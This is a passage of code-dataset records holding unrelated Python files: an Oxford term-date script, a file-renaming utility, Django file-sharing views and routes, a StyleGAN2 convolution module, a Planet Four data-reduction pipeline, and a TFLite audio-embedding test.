parse_date(os.environ['OXFORD_TERM_START'])\n\nif len(sys.argv) > 1:\n arg = sys.argv[1]\n date_match = re.match(\"([0-9]{4})-([0-9]{2})-([0-9]{2})\", arg)\n ox_match = re.match(\"(Su|M|Tu|W|Th|F|Sa)([0-9].*)\", arg)\n if date_match:\n week, weekday = term_date(start_date, parse_date(arg))\n print(weekday + \" of \" + ordinal(week) + \" week\")\n elif ox_match:\n weekday = ox_match.group(1)\n week = int(ox_match.group(2))\n print(format_date(actual_date(start_date, weekday, week)))\n else:\n sys.exit(1)\nelse:\n 
sys.exit(1)\n","sub_path":"oxtermdate.py","file_name":"oxtermdate.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20170677","text":"import os\r\n\r\n# Getting the current work directory (cwd)\r\nthisdir = os.getcwd()\r\nindex =1\r\n# r=root, d=directories, f = files\r\nfor r, d, f in os.walk(thisdir):\r\n for file in f:\r\n if not \".py\" in file:\r\n # if (len(file) < 8):\r\n src = os.path.join(r, file)\r\n dst = os.path.join(r, str(index)+\".jpg\")\r\n print( file, src, dst)\r\n os.rename(src, dst)\r\n index = index + 1\r\n","sub_path":"KB/Machine Learning/code/utils/RenameFiles.py","file_name":"RenameFiles.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307851136","text":"from django.shortcuts import render\r\nfrom .import forms\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n\r\n# return HttpResponse(\"Hie\")\r\n # my_dict = {'insert_me': \"Hello I am from views.py file\"}\r\n return render(request, 'blogpost /index.html')\r\n\r\ndef form_name_view(request):\r\n form = forms.FormName()\r\n if request.method==\"POST\":\r\n form=forms.FormName(request.POST)\r\n if form.is_valid():\r\n print(\"Validation sucess\")\r\n print(\"Name:\" + form.cleaned_data['name'])\r\n print(\"Email:\" + form.cleaned_data['email'])\r\n print(\"Text info:\" + form.cleaned_data['text'])\r\n return render(request,'blogpost/form_page.html',{'form': form})","sub_path":"firstcrud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359515014","text":"# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.\n#\n# NVIDIA CORPORATION and its licensors retain all intellectual property\n# and proprietary rights in and to this software, related documentation\n# and any modifications thereto. Any use, reproduction, disclosure or\n# distribution of this software and related documentation without an express\n# license agreement from NVIDIA CORPORATION is strictly prohibited.\n\n\"\"\"2D convolution with optional up/downsampling.\"\"\"\n\nimport torch\n\nfrom .. import misc\nfrom . import conv2d_gradfix\nfrom . 
import upfirdn2d\nfrom .upfirdn2d import _parse_padding\nfrom .upfirdn2d import _get_filter_size\n\n#----------------------------------------------------------------------------\n\ndef _get_weight_shape(w):\n with misc.suppress_tracer_warnings(): # this value will be treated as a constant\n shape = [int(sz) for sz in w.shape]\n misc.assert_shape(w, shape)\n return shape\n\n#----------------------------------------------------------------------------\n\ndef _conv2d_wrapper(x, w, stride=1, padding=0, groups=1, transpose=False, flip_weight=True):\n \"\"\"Wrapper for the underlying `conv2d()` and `conv_transpose2d()` implementations.\n \"\"\"\n out_channels, in_channels_per_group, kh, kw = _get_weight_shape(w)\n\n # Flip weight if requested.\n if not flip_weight: # conv2d() actually performs correlation (flip_weight=True) not convolution (flip_weight=False).\n w = w.flip([2, 3])\n\n # Workaround performance pitfall in cuDNN 8.0.5, triggered when using\n # 1x1 kernel + memory_format=channels_last + less than 64 channels.\n if kw == 1 and kh == 1 and stride == 1 and padding in [0, [0, 0], (0, 0)] and not transpose:\n if x.stride()[1] == 1 and min(out_channels, in_channels_per_group) < 64:\n if out_channels <= 4 and groups == 1:\n in_shape = x.shape\n x = w.squeeze(3).squeeze(2) @ x.reshape([in_shape[0], in_channels_per_group, -1])\n x = x.reshape([in_shape[0], out_channels, in_shape[2], in_shape[3]])\n else:\n x = x.to(memory_format=torch.contiguous_format)\n w = w.to(memory_format=torch.contiguous_format)\n x = conv2d_gradfix.conv2d(x, w, groups=groups)\n return x.to(memory_format=torch.channels_last)\n\n # Otherwise => execute using conv2d_gradfix.\n op = conv2d_gradfix.conv_transpose2d if transpose else conv2d_gradfix.conv2d\n return op(x, w, stride=stride, padding=padding, groups=groups)\n\n#----------------------------------------------------------------------------\n\n@misc.profiled_function\ndef conv2d_resample(x, w, f=None, up=1, down=1, padding=0, groups=1, flip_weight=True, flip_filter=False):\n r\"\"\"2D convolution with optional up/downsampling.\n\n Padding is performed only once at the beginning, not between the operations.\n\n Args:\n x: Input tensor of shape\n `[batch_size, in_channels, in_height, in_width]`.\n w: Weight tensor of shape\n `[out_channels, in_channels//groups, kernel_height, kernel_width]`.\n f: Low-pass filter for up/downsampling. Must be prepared beforehand by\n calling upfirdn2d.setup_filter(). None = identity (default).\n up: Integer upsampling factor (default: 1).\n down: Integer downsampling factor (default: 1).\n padding: Padding with respect to the upsampled image. 
Can be a single number\n or a list/tuple `[x, y]` or `[x_before, x_after, y_before, y_after]`\n (default: 0).\n groups: Split input channels into N groups (default: 1).\n flip_weight: False = convolution, True = correlation (default: True).\n flip_filter: False = convolution, True = correlation (default: False).\n\n Returns:\n Tensor of the shape `[batch_size, num_channels, out_height, out_width]`.\n \"\"\"\n # Validate arguments.\n assert isinstance(x, torch.Tensor) and (x.ndim == 4)\n assert isinstance(w, torch.Tensor) and (w.ndim == 4) and (w.dtype == x.dtype)\n assert f is None or (isinstance(f, torch.Tensor) and f.ndim in [1, 2] and f.dtype == torch.float32)\n assert isinstance(up, int) and (up >= 1)\n assert isinstance(down, int) and (down >= 1)\n assert isinstance(groups, int) and (groups >= 1)\n out_channels, in_channels_per_group, kh, kw = _get_weight_shape(w)\n fw, fh = _get_filter_size(f)\n px0, px1, py0, py1 = _parse_padding(padding)\n\n # Adjust padding to account for up/downsampling.\n if up > 1:\n px0 += (fw + up - 1) // 2\n px1 += (fw - up) // 2\n py0 += (fh + up - 1) // 2\n py1 += (fh - up) // 2\n if down > 1:\n px0 += (fw - down + 1) // 2\n px1 += (fw - down) // 2\n py0 += (fh - down + 1) // 2\n py1 += (fh - down) // 2\n\n # Fast path: 1x1 convolution with downsampling only => downsample first, then convolve.\n if kw == 1 and kh == 1 and (down > 1 and up == 1):\n x = upfirdn2d.upfirdn2d(x=x, f=f, down=down, padding=[px0,px1,py0,py1], flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n return x\n\n # Fast path: 1x1 convolution with upsampling only => convolve first, then upsample.\n if kw == 1 and kh == 1 and (up > 1 and down == 1):\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n x = upfirdn2d.upfirdn2d(x=x, f=f, up=up, padding=[px0,px1,py0,py1], gain=up**2, flip_filter=flip_filter)\n return x\n\n # Fast path: downsampling only => use strided convolution.\n if down > 1 and up == 1:\n x = upfirdn2d.upfirdn2d(x=x, f=f, padding=[px0,px1,py0,py1], flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, stride=down, groups=groups, flip_weight=flip_weight)\n return x\n\n # Fast path: upsampling with optional downsampling => use transpose strided convolution.\n if up > 1:\n if groups == 1:\n w = w.transpose(0, 1)\n else:\n w = w.reshape(groups, out_channels // groups, in_channels_per_group, kh, kw)\n w = w.transpose(1, 2)\n w = w.reshape(groups * in_channels_per_group, out_channels // groups, kh, kw)\n px0 -= kw - 1\n px1 -= kw - up\n py0 -= kh - 1\n py1 -= kh - up\n pxt = max(min(-px0, -px1), 0)\n pyt = max(min(-py0, -py1), 0)\n x = _conv2d_wrapper(x=x, w=w, stride=up, padding=[pyt,pxt], groups=groups, transpose=True, flip_weight=(not flip_weight))\n x = upfirdn2d.upfirdn2d(x=x, f=f, padding=[px0+pxt,px1+pxt,py0+pyt,py1+pyt], gain=up**2, flip_filter=flip_filter)\n if down > 1:\n x = upfirdn2d.upfirdn2d(x=x, f=f, down=down, flip_filter=flip_filter)\n return x\n\n # Fast path: no up/downsampling, padding supported by the underlying implementation => use plain conv2d.\n if up == 1 and down == 1:\n if px0 == px1 and py0 == py1 and px0 >= 0 and py0 >= 0:\n return _conv2d_wrapper(x=x, w=w, padding=[py0,px0], groups=groups, flip_weight=flip_weight)\n\n # Fallback: Generic reference implementation.\n x = upfirdn2d.upfirdn2d(x=x, f=(f if up > 1 else None), up=up, padding=[px0,px1,py0,py1], gain=up**2, flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n if down > 1:\n x 
= upfirdn2d.upfirdn2d(x=x, f=f, down=down, flip_filter=flip_filter)\n return x\n\n#----------------------------------------------------------------------------\n","sub_path":"converters/stylegan2ada_pth_official/torch_utils/ops/conv2d_resample.py","file_name":"conv2d_resample.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464772532","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\n\nimport pandas as pd\nfrom IPython.parallel import Client\nfrom odo import odo\n\nfrom .helper_functions import define_season_column\nfrom .p4io import (data_root, get_current_database_fname,\n get_image_names_from_db)\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n# the split trick creates lists when u don't want to break ur fingers with\n# typing ',,'','',',,' all the time...\nblotch_data_cols = 'x y image_x image_y radius_1 radius_2'.split()\nfan_data_cols = 'x y image_x image_y distance angle spread'.split()\n\nanalysis_cols = ['classification_id',\n 'created_at',\n 'image_id',\n 'image_name',\n 'image_url',\n 'user_name',\n 'marking',\n 'x_tile',\n 'y_tile',\n 'acquisition_date',\n 'local_mars_time',\n 'x',\n 'y',\n 'image_x',\n 'image_y',\n 'radius_1',\n 'radius_2',\n 'distance',\n 'angle',\n 'spread',\n 'version']\n\ndata_columns = ['classification_id', 'image_id',\n 'image_name', 'user_name', 'marking',\n 'acquisition_date', 'local_mars_time']\n\n\ndef scan_for_incomplete(df, marking):\n \"\"\"scan for incomplete data and remove from dataframe.\"\"\"\n # split data into this marking and NOT this marking.\n marked = df[df.marking == marking]\n rest = df[df.marking != marking]\n\n if marking == 'fan':\n data_cols = fan_data_cols\n elif marking == 'blotch':\n data_cols = blotch_data_cols\n else:\n print(\"Not supported marking\")\n return\n\n # create index file. basic idea is: from the above defined data cols for\n # a marking, none of them is allowed to be unfilled. 
(== isnull )\n ind = marked[data_cols].isnull().any(axis=1)\n # select for negated index, as we do NOT want incomplete data\n marked = marked[~ind]\n\n # merge previously splitted together and return\n return pd.concat([marked, rest])\n\n\ndef convert_times(df):\n logging.info(\"Starting time conversion now.\")\n df.acquisition_date = pd.to_datetime(df.acquisition_date)\n df.created_at = pd.to_datetime(df.created_at,\n format='%Y-%m-%d %H:%M:%S %Z')\n logging.info(\"Time conversions done.\")\n\n\ndef splitting_tutorials(rootpath, df):\n logging.info(\"Splitting off tutorials now.\")\n tutorials = df[df.image_name == 'tutorial']\n tutfpath = '{}_tutorials.h5'.format(rootpath)\n tutorials = tutorials.drop(['image_id',\n 'image_url',\n 'image_name',\n 'local_mars_time'], axis=1)\n tutorials.to_hdf(tutfpath, 'df')\n\n logging.info(\"Tutorial split done.\\nCreated {}.\".format(tutfpath))\n return df[df.image_name != 'tutorial']\n\n\ndef produce_fast_read(rootpath, df):\n logging.info(\"Now writing fixed format datafile for \"\n \"fast read-in of all data.\")\n newfpath = '{0}_fast_all_read.h5'.format(rootpath)\n df.to_hdf(newfpath, 'df')\n logging.info(\"Created {}.\".format(newfpath))\n\n\ndef convert_ellipse_angles(df):\n logging.info(\"Converting ellipse angles.\")\n\n def func(angle):\n if angle < 0:\n return angle + 180\n elif angle > 180:\n return angle - 180\n else:\n return angle\n df.loc[df.marking == 'blotch', 'angle'].map(func)\n logging.info(\"Conversion of ellipse angles done.\")\n\n\ndef calculate_hirise_pixels(df):\n logging.info(\"Calculating and assigning hirise pixel coordinates\")\n df = df.assign(hirise_x=lambda row: (row.x + 740 * (row.x_tile - 1)).round(),\n hirise_y=lambda row: (row.y + 548 * (row.y_tile - 1)).round())\n logging.info(\"Hirise pixels coords added.\")\n return df\n\n\ndef remove_duplicates_from_image_name_data(data):\n \"\"\"remove duplicates from this data.\n\n Parameters\n ==========\n data: pd.DataFrame\n already filtered for an image_id\n\n Returns\n =======\n For each `user_name` and `image_id` found in `data` return only the data\n for the first found classification_id. There *should* only be one\n classification_id per user_name and image_id, but sometimes the queue\n presented the same image_id more than once to the same users. 
This removes\n any later in time classification_ids per user_name and image_id.\n \"\"\"\n def process_user_group(g):\n c_id = g.sort('created_at').classification_id.iloc[0]\n return g[g.classification_id == c_id]\n return data.groupby(['image_id', 'user_name']).apply(\n process_user_group).reset_index(drop=True)\n\n\ndef get_temp_fname(image_name):\n import os\n return os.path.join(data_root, 'temp_' + image_name + '.h5')\n\n\ndef remove_duplicates(df):\n logging.info('Removing duplicates.')\n\n image_names = df.image_name.unique()\n\n def process_image_name(image_name):\n data = df[df.image_name == image_name]\n data = remove_duplicates_from_image_name_data(data)\n data.to_hdf(get_temp_fname(image_name), 'df')\n\n # parallel approach, u need to launch an ipcluster/controller for this work!\n c = Client()\n dview = c.direct_view()\n dview.push({'remove_duplicates_from_image_name_data':\n remove_duplicates_from_image_name_data,\n 'data_root': data_root})\n lbview = c.load_balanced_view()\n lbview.map_sync(process_image_name, image_names)\n\n df = []\n for image_name in image_names:\n try:\n df.append(pd.read_hdf(get_temp_fname(image_name), 'df'))\n except OSError:\n continue\n else:\n os.remove(get_temp_fname(image_name))\n df = pd.concat(df, ignore_index=True)\n logging.info('Duplicates removal complete.')\n return df\n\n\ndef get_image_names(dbname):\n logging.info('Reading image_names from disk.')\n store = pd.HDFStore(dbname)\n image_names = store.select_column('df', 'image_name').unique()\n logging.info('Got image_names')\n return image_names\n\n\ndef merge_temp_files(dbname, image_names=None, do_odo=False):\n if do_odo:\n logging.info('Merging temp files with odo.')\n else:\n logging.info('Merging temp files manually.')\n\n if image_names is None:\n image_names = get_image_names(dbname)\n\n dbname_base, ext = os.path.splitext(dbname)\n dbnamenew = dbname_base + '_cleaned' + ext\n logging.info('Creating concatenated db file {}'.format(dbnamenew))\n if not do_odo:\n df = []\n for image_name in image_names:\n try:\n if do_odo:\n odo('hdfstore://{}::df'.format(get_temp_fname(image_name)),\n 'hdfstore://{}::df'.format(dbnamenew))\n else:\n df.append(pd.read_hdf(get_temp_fname(image_name), 'df'))\n except OSError:\n continue\n else:\n os.remove(get_temp_fname(image_name))\n df = pd.concat(df, ignore_index=True)\n df.to_hdf(dbnamenew, 'df',\n format='table',\n data_columns=data_columns)\n logging.info('Duplicates removal complete.')\n return dbnamenew\n\n\ndef remove_duplicates_from_file(dbname, do_odo=False):\n logging.info('Removing duplicates.')\n\n image_names = get_image_names(dbname)\n\n def process_image_name(image_name):\n import pandas as pd\n data = pd.read_hdf(dbname, 'df', where='image_name==' + image_name)\n data = remove_duplicates_from_image_name_data(data)\n data.to_hdf(get_temp_fname(image_name), 'df')\n\n # parallel approach, u need to launch an ipcluster/controller for this work!\n c = Client()\n dview = c.direct_view()\n dview.push({'remove_duplicates_from_image_name_data':\n remove_duplicates_from_image_name_data,\n 'data_root': data_root,\n 'get_temp_fname': get_temp_fname})\n lbview = c.load_balanced_view()\n logging.info('Starting parallel processing.')\n lbview.map_sync(process_image_name, image_names)\n logging.info('Done clean up. 
Now concatenating results.')\n\n merge_temp_files(dbname, image_names, do_odo)\n\n\ndef create_season2_and_3_database():\n \"\"\"Define season columns and write out seaon 2 and 3 database results.\n\n Has to be executed after the main reduction has finished.\n Installed as main command line script under name create_season2and3.\n \"\"\"\n fname = get_current_database_fname()\n image_names = get_image_names_from_db(fname)\n metadf = pd.DataFrame(image_names[image_names != 'tutorial'],\n columns=['image_name'])\n logging.info('Found {} image_names'.format(len(metadf.image_name)))\n\n define_season_column(metadf)\n\n fname_base = os.path.basename(fname)\n root = os.path.dirname(fname)\n fname_no_ext = os.path.splitext(fname_base)[0]\n rootpath = os.path.join(root, fname_no_ext)\n newfname = '{}_seasons2and3.h5'.format(rootpath)\n if os.path.exists(newfname):\n os.remove(newfname)\n logging.info('Starting production of season 2 and 3 database.')\n all_images = metadf[(metadf.season > 1) & (metadf.season < 4)].image_name\n for i, image_name in enumerate(all_images):\n logging.info('Processing... {:.1f} %'\n .format(100 * (i + 1) / len(all_images)))\n try:\n df = pd.read_hdf(fname, 'df', where='image_name=' + image_name)\n df.to_hdf(newfname, 'df', mode='a', format='t', append=True,\n data_columns=data_columns,\n min_itemsize={'local_mars_time': 8})\n except ValueError as e:\n print(image_name, e)\n sys.exit(-1)\n logging.info('Finished. Produced {}.'.format(newfname))\n\n\ndef main():\n import imp\n try:\n imp.find_module('tables')\n except ImportError:\n print(\"Please install the PyTables module. It is required.\")\n sys.exit()\n parser = argparse.ArgumentParser()\n parser.add_argument('csv_fname',\n help=\"Provide the filename of the database \"\n \"dump csv-file here.\")\n parser.add_argument('--raw_times',\n help=\"Do not parse the times into a Python datetime\"\n \" object. For the stone-age. ;) Default:\"\n \" parse into datetime object.\",\n action='store_true')\n parser.add_argument('--keep_dirt',\n help=\"Do not filter for dirty data. Keep everything.\"\n \" Default: Do the filtering.\",\n action='store_true')\n parser.add_argument('--do_fastread',\n help='Produce the fast-read database file for'\n ' complete read into memory.',\n action='store_true')\n parser.add_argument('--remove_dups',\n help='Remove duplicates from database',\n action='store_true')\n parser.add_argument('--test_n_rows',\n help=\"Set this to do a test parse of n rows\",\n type=int, default=None)\n args = parser.parse_args()\n\n t0 = time.time()\n logging.info(\"Starting reduction.\")\n\n # creating file paths\n fname = os.path.abspath(args.csv_fname)\n fname_base = os.path.basename(fname)\n root = os.path.dirname(fname)\n fname_no_ext = os.path.splitext(fname_base)[0]\n rootpath = os.path.join(root, fname_no_ext)\n\n # as chunksize and nrows cannot be used together yet, i switch chunksize\n # to None if I want test_n_rows for a small test database:\n if args.test_n_rows is not None:\n chunks = None\n else:\n chunks = 1e6\n # creating reader object with pandas interface for csv parsing\n # doing this in chunks as its faster. 
Also, later will do a split\n # into multiple processes to do this.\n reader = pd.read_csv(fname, chunksize=chunks, na_values=['null'],\n usecols=analysis_cols, nrows=args.test_n_rows,\n engine='c')\n\n # read in data chunk by chunk and collect into python list\n data = [chunk for chunk in reader]\n logging.info(\"Data collected into list.\")\n\n # convert list into Pandas dataframe\n df = pd.concat(data, ignore_index=True)\n logging.info(\"Conversion to dataframe complete.\")\n\n # convert times to datetime object\n if not args.raw_times:\n convert_times(df)\n\n # split off tutorials\n df = splitting_tutorials(rootpath, df)\n\n logging.info('Scanning for and dropping empty lines now.')\n df = df.dropna(how='all')\n logging.info(\"Dropped empty lines.\")\n\n if not args.keep_dirt:\n logging.info(\"Now scanning for incomplete marking data.\")\n for marking in ['fan', 'blotch']:\n df = scan_for_incomplete(df, marking)\n logging.info(\"Done removing incompletes.\")\n\n convert_ellipse_angles(df)\n\n df = calculate_hirise_pixels(df)\n\n if args.do_fastread:\n produce_fast_read(rootpath, df)\n\n logging.info(\"Now writing query-able database file.\")\n newfpath = '{0}_queryable.h5'.format(rootpath)\n df.to_hdf(newfpath, 'df',\n format='table',\n data_columns=['image_name'])\n logging.info(\"Writing to HDF file finished. Created {}. \"\n \"Reduction complete.\".format(newfpath))\n\n if args.remove_dups:\n remove_duplicates_from_file(newfpath)\n\n dt = time.time() - t0\n logging.info(\"Time taken: {} minutes.\".format(dt / 60.0))\n\nif __name__ == '__main__':\n main()\n","sub_path":"planet4/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":13791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"233694502","text":"\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\nimport os\nimport random\nimport csv\nimport json\nimport glob\nimport numpy as np\nimport resampy\n#import tensorflow as tf\nimport tflite_runtime.interpreter as tflite\nimport soundfile as sf\nimport librosa\nimport time\nimport sys\n\ndef initialize_uninitialized_variables(sess):\n if hasattr(tf, 'global_variables'):\n variables = tf.global_variables()\n else:\n variables = tf.all_variables()\n\n uninitialized_variables = []\n for v in variables:\n if not hasattr(v, '_keras_initialized') or not v._keras_initialized:\n uninitialized_variables.append(v)\n v._keras_initialized = True\n\n if uninitialized_variables:\n if hasattr(tf, 'variables_initializer'):\n sess.run(tf.variables_initializer(uninitialized_variables))\n else:\n sess.run(tf.initialize_variables(uninitialized_variables)) \n \ndef get_l3model(model_path, saved_model_type='tflite'):\n l3embedding_model = tflite.Interpreter(model_path=model_path) \n return l3embedding_model\n\ndef get_output_path(filepath, suffix, output_dir=None):\n \"\"\"\n Parameters\n ----------\n filepath : str\n Path to audio file to be processed\n suffix : str\n String to append to filename (including extension)\n output_dir : str or None\n Path to directory where file will be saved. 
If None, will use directory of given filepath.\n Returns\n -------\n output_path : str\n Path to output file\n \"\"\"\n base_filename = os.path.splitext(os.path.basename(filepath))[0]\n if not output_dir:\n output_dir = os.path.dirname(filepath)\n\n if suffix[0] != '.':\n output_filename = \"{}_{}\".format(base_filename, suffix)\n else:\n output_filename = base_filename + suffix\n\n return os.path.join(output_dir, output_filename)\n\ndef _center_audio(audio, frame_len):\n \"\"\"Center audio so that first sample will occur in the middle of the first frame\"\"\"\n return np.pad(audio, (int(frame_len / 2.0), 0), mode='constant', constant_values=0)\n\n\ndef _pad_audio(audio, frame_len, hop_len):\n \"\"\"Pad audio if necessary so that all samples are processed\"\"\"\n audio_len = audio.size\n if audio_len < frame_len:\n pad_length = frame_len - audio_len\n else:\n pad_length = int(np.ceil((audio_len - frame_len)/float(hop_len))) * hop_len \\\n - (audio_len - frame_len)\n\n if pad_length > 0:\n audio = np.pad(audio, (0, pad_length), mode='constant', constant_values=0)\n\n return audio\n\ndef _amplitude_to_db(S, amin=1e-10, dynamic_range=80.0):\n magnitude = np.abs(S)\n power = np.square(magnitude, out=magnitude)\n ref_value = power.max()\n\n log_spec = 10.0 * np.log10(np.maximum(amin, magnitude))\n log_spec -= log_spec.max()\n\n log_spec = np.maximum(log_spec, -dynamic_range)\n return log_spec\n\ndef get_embedding(audio, sr, model=None, hop_size=0.1, center=True,\\\n n_fft=None, n_mels=None, mel_hop_len=None, fmax=None):\n \"\"\"\n Computes and returns L3 embedding for given audio data\n \"\"\"\n interpreter = model\n \n if audio.size == 0:\n raise ValueError('Got empty audio')\n\n # Resample if necessary\n if sr != TARGET_SR:\n audio = resampy.resample(audio, sr_orig=sr, sr_new=TARGET_SR, filter='kaiser_best')\n\n audio_len = audio.size\n frame_len = TARGET_SR\n hop_len = int(hop_size * TARGET_SR)\n\n if audio_len < frame_len:\n warnings.warn('Duration of provided audio is shorter than window size (1 second). 
Audio will be padded.',\n L3Warning)\n\n if center:\n # Center audio\n audio = _center_audio(audio, frame_len)\n\n # Pad if necessary to ensure that we process all samples\n audio = _pad_audio(audio, frame_len, hop_len)\n\n # Split audio into frames, copied from librosa.util.frame\n frames = librosa.util.utils.frame(audio, frame_length=frame_len, hop_length=hop_len).T\n X = []\n for frame in frames:\n S = np.abs(librosa.core.stft(frame, n_fft=n_fft, hop_length=mel_hop_len,\\\n window='hann', center=True, pad_mode='constant'))\n S = librosa.feature.melspectrogram(sr=sr, S=S, n_mels=n_mels, fmax=fmax,\n power=1.0, htk=True)\n S = _amplitude_to_db(np.array(S))\n X.append(S)\n\n #X = np.array(X)[:, :, :, np.newaxis].astype(np.float32)\n\n # Get the L3 embedding for each frame\n batch_size = len(X)\n\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n input_shape = input_details[0]['shape'][1:]\n output_shape = output_details[0]['shape'][1:]\n input_index = input_details[0]['index']\n output_index = output_details[0]['index']\n embedding_length = output_shape[-1]\n \n #interpreter.resize_tensor_input(input_index, ((batch_size, ) + tuple(input_shape)))\n #interpreter.resize_tensor_input(output_index, ((batch_size, ) + tuple(output_shape)))\n \n # print(\"== Input details ==\")\n # print(interpreter.get_input_details()[0])\n # print(\"type:\", input_details[0]['dtype'])\n # print(\"\\n== Output details ==\")\n # print(interpreter.get_output_details()[0])\n \n predictions = np.zeros((batch_size, embedding_length), dtype=np.float32)\n\n\n for idx in range(len(X)):\n #predictions per batch\n #print(np.array(X[idx]).shape)\n x = np.array(X[idx])[np.newaxis, :, :, np.newaxis].astype(np.float32)\n interpreter.set_tensor(input_index, x)\n interpreter.invoke()\n #print('Interpreter Invoked!')\n output = interpreter.get_tensor(output_index)\n predictions[idx] = np.reshape(output, (output.shape[0], output.shape[-1]))\n return predictions\n\ndef process_file(filepath, output_dir=None, model=None, hop_size=0.1,\\\n n_fft=None, n_mels=None, mel_hop_len=None, fmax=None):\n \"\"\"\n Computes and saves L3 embedding for given audio file\n \"\"\"\n if not os.path.exists(filepath):\n raise ValueError('File \"{}\" could not be found.'.format(filepath))\n\n try:\n audio, sr = sf.read(filepath)\n except Exception:\n raise ValueError('Could not open file \"{}\":\\n{}'.format(filepath, traceback.format_exc()))\n\n output_path = get_output_path(filepath, \".npz\", output_dir=output_dir)\n\n embedding = get_embedding(audio, sr, model=model, hop_size=hop_size,\\\n n_fft=n_fft, n_mels=n_mels, mel_hop_len=mel_hop_len, fmax=fmax)\n\n np.savez(output_path, embedding=embedding)\n assert os.path.exists(output_path)\n \nif __name__=='__main__':\n TEST_DIR = os.path.dirname(os.path.realpath('__file__')) #os.path.dirname(__file__)\n TEST_AUDIO_DIR = os.path.join(TEST_DIR, 'data')\n TFLITE_MODELS_DIR = os.path.join(TEST_DIR, 'tflite_models')\n OUTPUT_DIR = os.path.join(TEST_DIR, 'output')\n model_name = sys.argv[1]\n model_path = os.path.join(TFLITE_MODELS_DIR, model_name)\n CHIRP_1S_PATH = os.path.join(TEST_AUDIO_DIR, sys.argv[2])\n CHIRP_44K_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_44k.wav')\n\n if not os.path.isdir(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n \n TARGET_SR = int(sys.argv[3])\n #n_mels = 64\n n_mels = int(sys.argv[4])\n hop_size = 0.1 \n #mel_hop_len = 160\n mel_hop_len = int(sys.argv[5])\n n_fft = 2048 \n fmax=None\n \n 
saved_model_type = 'tflite' \n l3embedding_model = get_l3model(model_path, saved_model_type=saved_model_type)\n for x in range(10):\n st = time.time()\n process_file(CHIRP_1S_PATH, output_dir=OUTPUT_DIR, model=l3embedding_model, hop_size=hop_size,\\\n n_mels=n_mels, n_fft=n_fft, mel_hop_len=mel_hop_len, fmax=fmax)\n print('Inference run %i: %0.3f' % (x + 1, time.time() - st))\n","sub_path":"test_emb_gen_tflite.py","file_name":"test_emb_gen_tflite.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"370644837","text":"import django.views.defaults\nfrom django.conf.urls import include, url\nfrom django.contrib.auth.views import login as django_login\nfrom django.contrib.auth.views import logout as django_logout\n\nurlpatterns = [\n url(r'^$', 'website.views.index', name=\"index\"),\n url(r'^myfiles$', 'website.views.myfiles', name=\"myfiles\"),\n url(r'^cockpit$', 'website.views.cockpit', name=\"cockpit\"),\n url(r'^upload', 'website.views.upload', name=\"upload\"),\n url(r'^about', 'website.views.about', name=\"about\"),\n\n # Ajax views\n url(r'^generate_registration_key$', 'website.views.generate_registration_key', name=\"generate_registration_key\"),\n url(r'^mark_key_distributed$', 'website.views.mark_key_distributed', name=\"mark_key_distributed\"),\n url(r'^revoke_key$', 'website.views.revoke_key', name=\"revoke_key\"),\n url(r'^size_available$', 'website.views.size_available', name=\"size_available\"),\n\n # Authentication views\n url(r'^register$', 'website.views.register', name=\"register\"),\n url(r'^login$', django_login, name=\"login\"),\n url(r'^logout$', django_logout, {'template_name': \"registration/logout.html\"}, name=\"logout\"),\n\n # File downloading view\n url(r'^dl/(?P[-A-Za-z0-9_]+)$', 'website.views.download', name=\"download\"),\n url(r'^get/(?P[-A-Za-z0-9_]+)$', 'website.views.get', name=\"get\"),\n # File deleting view\n url(r'^rm/(?P[-A-Za-z0-9_]+)$', 'website.views.delete', name=\"delete\"),\n # File updating view\n url(r'^update/(?P[-A-Za-z0-9_]+)$', 'website.views.update', name=\"update\"),\n # Get file name\n url(r'^get_name/(?P[-A-Za-z0-9_]+)$', 'website.views.get_name', name=\"get_name\"),\n\n # 404 page\n url(r'^404$', 'django.views.defaults.page_not_found')\n]\n","sub_path":"fshare/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"619249698","text":"# pat\n\nfrom enum import Enum\n\n\n\nclass Vehicle(Enum):\n THRUSTSSC = (\"1227.985 km\", \"1 hr\")\n VESCO_TURBINATOR_II = (\"745.187 km\", \"1 hr\")\n ACT_ATTACK = (\"605.698 km\", \"1 hr\")\n JCB_DIESELMAX = (\"563.998 km\", \"1.5 hr\")\n VENTURI_VBB_3_STREAMLINER = (\"550.627 km\", \"2.2 hr\")\n BLACK_KNIGHT = (\"338.14 km\", \"1.2 hr\")\n RC_BULLET = (\"325.12 km\", \"2.2 hr\")\n INSPIRATION = (\"238.679 km\", \"1 hr\")\n ECOTRICITY_GREENBIRD = (\"203.09 km\", \"2.1 hr\")\n AEROVELO_ETA = (\"144.17 km\", \"1 hr\")\n SKY_ACE_TIGA = (\"91.332 km\", 